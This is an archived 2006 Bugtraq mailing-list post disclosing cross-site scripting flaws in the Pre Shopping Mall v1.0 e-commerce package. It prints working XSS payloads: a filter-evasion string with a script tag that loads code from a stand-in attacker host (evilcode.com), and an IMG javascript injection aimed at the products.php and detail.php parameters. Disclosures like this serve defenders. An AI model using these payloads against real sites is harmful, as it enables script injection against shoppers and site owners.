Pre Shopping Mall v1.0

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Pre Shopping Mall v1.0
From: luny@xxxxxxxxxxxxxxx
Date: 24 May 2006 10:02:10 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Pre Shopping Mall

Homepage:
http://www.preprojects.com/emall.asp

Description:
PRE SHOPPING MALL a power full ecommerce shopping mall solution. If you need to 
setup a online shop or shopping mall PRE SHOPPING MALL is your quickest 
solution. You can setup your Emall within few hours. Buy install and start 
selling your products. Very easy to installs and manage powerful 
administration. Receive payments either through Paypal or Authorize.net. 
Quickest solution for your online business.

Effected files:
search box.
detail.php
products.php

Exploits & Vulns:

XSS Vulnerabilities:

The search and login  box does not sanatize user input before generating it 
dynamically. This could cause XSS.

For proof of concept just try putting this in the search box:
'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT 
SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--"

<XSS>=&{()}

More XSS Vulns:
For the XSS examples we'll use url injection with the tag: 
<IMG%20SRC=javascript:alert('XSS')>
http://www.example.com/emall/products.php?cid=[XSS]
http://www.example.com/emall/detail.php?prodid=[XSS]

Prev by Date: CMS Mundo V1.0
Next by Date: [KAPDA::#44] - NewsCMSLite Login ByPass by Cookie
Previous by thread: CMS Mundo V1.0
Next by thread: [KAPDA::#44] - NewsCMSLite Login ByPass by Cookie
Index(es):
- Date
- Thread